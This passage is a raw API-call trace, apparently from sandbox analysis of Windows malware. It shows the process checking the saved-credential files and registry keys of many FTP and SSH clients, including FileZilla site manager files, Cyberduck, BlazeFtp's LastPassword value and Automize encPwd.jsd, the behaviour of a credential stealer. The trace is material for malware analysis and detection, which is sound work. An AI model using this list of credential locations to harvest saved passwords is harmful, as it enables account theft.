dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.390] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.390] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize12\\encPwd.jsd") returned 0 [0114.390] GetProcessHeap () returned 0x5b0000 [0114.390] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.390] GetProcessHeap () returned 0x5b0000 [0114.390] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.391] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.392] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\Automize12\\data\\settings\\sshProfiles-j.jsd") returned 65 [0114.392] GetProcessHeap () returned 0x5b0000 [0114.392] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x86) returned 0x5c9390 [0114.392] GetProcessHeap () returned 0x5b0000 [0114.392] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.393] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.393] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize12\\data\\settings\\sshProfiles-j.jsd") returned 0 [0114.393] GetProcessHeap () returned 0x5b0000 [0114.394] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.394] GetProcessHeap () returned 0x5b0000 [0114.394] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.395] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.395] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\Automize12\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0114.395] GetProcessHeap () returned 0x5b0000 [0114.395] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x86) returned 0x5c9390 [0114.395] GetProcessHeap () returned 0x5b0000 [0114.396] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.397] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.397] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize12\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0114.397] GetProcessHeap () returned 0x5b0000 [0114.397] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.397] GetProcessHeap () returned 0x5b0000 [0114.397] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f64) returned 0x5cb930 [0114.398] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.399] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\encPwd.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\Automize13\\encPwd.jsd") returned 44 [0114.399] GetProcessHeap () returned 0x5b0000 [0114.399] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x5c) returned 0x5c9390 [0114.399] GetProcessHeap () returned 0x5b0000 [0114.399] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.400] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.400] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize13\\encPwd.jsd") returned 0 [0114.400] GetProcessHeap () returned 0x5b0000 [0114.401] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.401] GetProcessHeap () returned 0x5b0000 [0114.401] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.401] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.402] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\Automize13\\data\\settings\\sshProfiles-j.jsd") returned 65 [0114.402] GetProcessHeap () returned 0x5b0000 [0114.402] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x86) returned 0x5c9390 [0114.402] GetProcessHeap () returned 0x5b0000 [0114.403] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.403] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.403] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize13\\data\\settings\\sshProfiles-j.jsd") returned 0 [0114.404] GetProcessHeap () returned 0x5b0000 [0114.404] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.404] GetProcessHeap () returned 0x5b0000 [0114.404] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.405] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.405] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\Automize13\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0114.405] GetProcessHeap () returned 0x5b0000 [0114.405] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x86) returned 0x5c9390 [0114.405] GetProcessHeap () returned 0x5b0000 [0114.406] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.407] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.407] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize13\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0114.407] GetProcessHeap () returned 0x5b0000 [0114.407] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.407] GetProcessHeap () returned 0x5b0000 [0114.407] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f64) returned 0x5cb930 [0114.408] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.409] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\encPwd.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\Automize14\\encPwd.jsd") returned 44 [0114.409] GetProcessHeap () returned 0x5b0000 [0114.409] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x5c) returned 0x5c9390 [0114.409] GetProcessHeap () returned 0x5b0000 [0114.409] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.411] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.411] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize14\\encPwd.jsd") returned 0 [0114.411] GetProcessHeap () returned 0x5b0000 [0114.412] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.412] GetProcessHeap () returned 0x5b0000 [0114.412] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.412] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.413] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\Automize14\\data\\settings\\sshProfiles-j.jsd") returned 65 [0114.413] GetProcessHeap () returned 0x5b0000 [0114.413] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x86) returned 0x5c9390 [0114.413] GetProcessHeap () returned 0x5b0000 [0114.414] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.415] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.415] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize14\\data\\settings\\sshProfiles-j.jsd") returned 0 [0114.415] GetProcessHeap () returned 0x5b0000 [0114.415] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.415] GetProcessHeap () returned 0x5b0000 [0114.415] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.416] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.417] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\Automize14\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0114.417] GetProcessHeap () returned 0x5b0000 [0114.417] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x86) returned 0x5c9390 [0114.417] GetProcessHeap () returned 0x5b0000 [0114.417] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.418] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.418] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize14\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0114.418] GetProcessHeap () returned 0x5b0000 [0114.418] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.418] GetProcessHeap () returned 0x5b0000 [0114.418] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.419] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.419] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0114.419] GetProcessHeap () returned 0x5b0000 [0114.419] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f58) returned 0x5cb930 [0114.420] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.421] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\Cyberduck", arglist=0xdfb88 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Cyberduck") returned 47 [0114.421] GetProcessHeap () returned 0x5b0000 [0114.421] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x62) returned 0x5caae8 [0114.421] GetProcessHeap () returned 0x5b0000 [0114.421] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.422] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.422] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Cyberduck") returned 0 [0114.422] GetProcessHeap () returned 0x5b0000 [0114.423] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.423] GetProcessHeap () returned 0x5b0000 [0114.423] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caae8 | out: hHeap=0x5b0000) returned 1 [0114.423] GetProcessHeap () returned 0x5b0000 [0114.423] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.424] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.424] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0114.424] GetProcessHeap () returned 0x5b0000 [0114.424] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5cb930 [0114.425] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.425] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\iterate_GmbH", arglist=0xdfb70 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\iterate_GmbH") returned 50 [0114.425] GetProcessHeap () returned 0x5b0000 [0114.425] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x68) returned 0x5caae8 [0114.425] GetProcessHeap () returned 0x5b0000 [0114.426] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.427] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.427] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\iterate_GmbH") returned 0 [0114.427] GetProcessHeap () returned 0x5b0000 [0114.428] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.428] GetProcessHeap () returned 0x5b0000 [0114.428] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caae8 | out: hHeap=0x5b0000) returned 1 [0114.428] GetProcessHeap () returned 0x5b0000 [0114.428] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.429] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.429] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX") returned 0x0 [0114.431] GetProcessHeap () returned 0x5b0000 [0114.431] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f80) returned 0x5cb930 [0114.432] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.433] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\.config\\fullsync\\profiles.xml", arglist=0xdfba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\.config\\fullsync\\profiles.xml") returned 51 [0114.433] GetProcessHeap () returned 0x5b0000 [0114.433] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x6a) returned 0x5caae8 [0114.433] GetProcessHeap () returned 0x5b0000 [0114.433] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.434] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.434] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\.config\\fullsync\\profiles.xml") returned 0 [0114.434] GetProcessHeap () returned 0x5b0000 [0114.435] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caae8 | out: hHeap=0x5b0000) returned 1 [0114.435] GetProcessHeap () returned 0x5b0000 [0114.435] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.435] GetProcessHeap () returned 0x5b0000 [0114.435] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f72) returned 0x5cb930 [0114.436] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.436] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\FTPInfo\\ServerList.xml", arglist=0xdfba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPInfo\\ServerList.xml") returned 60 [0114.436] GetProcessHeap () returned 0x5b0000 [0114.436] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7c) returned 0x5c9390 [0114.437] GetProcessHeap () returned 0x5b0000 [0114.437] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.438] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.438] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPInfo\\ServerList.xml") returned 0 [0114.438] GetProcessHeap () returned 0x5b0000 [0114.438] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.438] GetProcessHeap () returned 0x5b0000 [0114.438] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f72) returned 0x5cb930 [0114.439] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.440] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\FTPInfo\\ServerList.cfg", arglist=0xdfb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPInfo\\ServerList.cfg") returned 60 [0114.440] GetProcessHeap () returned 0x5b0000 [0114.440] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7c) returned 0x5c9390 [0114.440] GetProcessHeap () returned 0x5b0000 [0114.440] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.441] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.441] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPInfo\\ServerList.cfg") returned 0 [0114.441] GetProcessHeap () returned 0x5b0000 [0114.442] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.442] GetProcessHeap () returned 0x5b0000 [0114.442] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e8) returned 0x5cb930 [0114.442] GetProcessHeap () returned 0x5b0000 [0114.442] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xc) returned 0x5bc128 [0114.442] GetProcessHeap () returned 0x5b0000 [0114.442] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa00 [0114.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.443] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\LinasFTP\\Site Manager", phkResult=0x5caa00 | out: phkResult=0x5caa00*=0x0) returned 0x2 [0114.443] GetProcessHeap () returned 0x5b0000 [0114.443] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa00 | out: hHeap=0x5b0000) returned 1 [0114.443] GetProcessHeap () returned 0x5b0000 [0114.444] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.444] GetProcessHeap () returned 0x5b0000 [0114.444] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bc128 | out: hHeap=0x5b0000) returned 1 [0114.444] GetProcessHeap () returned 0x5b0000 [0114.444] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.444] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.445] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0114.445] GetProcessHeap () returned 0x5b0000 [0114.445] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f74) returned 0x5cb930 [0114.446] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.446] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\FileZilla\\Filezilla.xml", arglist=0xdfb9c | out: param_1="C:\\Program Files (x86)\\FileZilla\\Filezilla.xml") returned 46 [0114.446] GetProcessHeap () returned 0x5b0000 [0114.446] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x60) returned 0x5caae8 [0114.446] GetProcessHeap () returned 0x5b0000 [0114.447] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.447] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.448] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FileZilla\\Filezilla.xml") returned 0 [0114.448] GetProcessHeap () returned 0x5b0000 [0114.448] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caae8 | out: hHeap=0x5b0000) returned 1 [0114.448] GetProcessHeap () returned 0x5b0000 [0114.449] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.449] GetProcessHeap () returned 0x5b0000 [0114.449] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f74) returned 0x5cb930 [0114.449] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.450] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\FileZilla\\filezilla.xml", arglist=0xdfb90 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\filezilla.xml") returned 61 [0114.450] GetProcessHeap () returned 0x5b0000 [0114.450] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7e) returned 0x5c9390 [0114.450] GetProcessHeap () returned 0x5b0000 [0114.450] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.451] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.451] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\filezilla.xml") returned 0 [0114.452] GetProcessHeap () returned 0x5b0000 [0114.452] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.452] GetProcessHeap () returned 0x5b0000 [0114.452] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f7c) returned 0x5cb930 [0114.452] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.453] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\FileZilla\\recentservers.xml", arglist=0xdfb84 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\recentservers.xml") returned 65 [0114.453] GetProcessHeap () returned 0x5b0000 [0114.453] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x86) returned 0x5c9390 [0114.453] GetProcessHeap () returned 0x5b0000 [0114.454] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.454] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.454] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\recentservers.xml") returned 0 [0114.455] GetProcessHeap () returned 0x5b0000 [0114.455] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.455] GetProcessHeap () returned 0x5b0000 [0114.455] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f78) returned 0x5cb930 [0114.456] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.456] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\FileZilla\\sitemanager.xml", arglist=0xdfb78 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\sitemanager.xml") returned 63 [0114.456] GetProcessHeap () returned 0x5b0000 [0114.456] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x82) returned 0x5c9390 [0114.457] GetProcessHeap () returned 0x5b0000 [0114.457] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.460] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.460] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\sitemanager.xml") returned 0 [0114.460] GetProcessHeap () returned 0x5b0000 [0114.460] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.460] GetProcessHeap () returned 0x5b0000 [0114.460] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.461] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.461] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0114.462] GetProcessHeap () returned 0x5b0000 [0114.462] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6c) returned 0x5cb930 [0114.462] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.463] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\Staff-FTP\\sites.ini", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\Staff-FTP\\sites.ini") returned 42 [0114.463] GetProcessHeap () returned 0x5b0000 [0114.463] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x58) returned 0x5caae8 [0114.463] GetProcessHeap () returned 0x5b0000 [0114.463] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.464] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.464] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Staff-FTP\\sites.ini") returned 0 [0114.464] GetProcessHeap () returned 0x5b0000 [0114.465] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caae8 | out: hHeap=0x5b0000) returned 1 [0114.465] GetProcessHeap () returned 0x5b0000 [0114.465] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.465] GetProcessHeap () returned 0x5b0000 [0114.466] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f68) returned 0x5cb930 [0114.466] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.467] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\BlazeFtp\\site.dat", arglist=0xdfb3c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\BlazeFtp\\site.dat") returned 55 [0114.467] GetProcessHeap () returned 0x5b0000 [0114.467] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x72) returned 0x5c7410 [0114.467] GetProcessHeap () returned 0x5b0000 [0114.468] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.468] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.469] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\BlazeFtp\\site.dat") returned 0 [0114.469] GetProcessHeap () returned 0x5b0000 [0114.469] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7410 | out: hHeap=0x5b0000) returned 1 [0114.469] GetProcessHeap () returned 0x5b0000 [0114.469] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cb930 [0114.470] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.470] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\FlashPeak\\BlazeFtp\\Settings", pszValue="LastPassword", pdwType=0x0, pvData=0x5cb930, pcbData=0xdfb3c*=0x104 | out: pdwType=0x0, pvData=0x5cb930, pcbData=0xdfb3c*=0x104) returned 0x2 [0114.470] GetProcessHeap () returned 0x5b0000 [0114.471] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.471] GetProcessHeap () returned 0x5b0000 [0114.471] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.472] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.472] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0114.472] GetProcessHeap () returned 0x5b0000 [0114.472] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f80) returned 0x5cb930 [0114.473] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.474] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\Fastream NETFile\\My FTP Links", arglist=0xdfb94 | out: param_1="C:\\Program Files (x86)\\Fastream NETFile\\My FTP Links") returned 52 [0114.474] GetProcessHeap () returned 0x5b0000 [0114.474] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x6c) returned 0x5caae8 [0114.474] GetProcessHeap () returned 0x5b0000 [0114.474] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 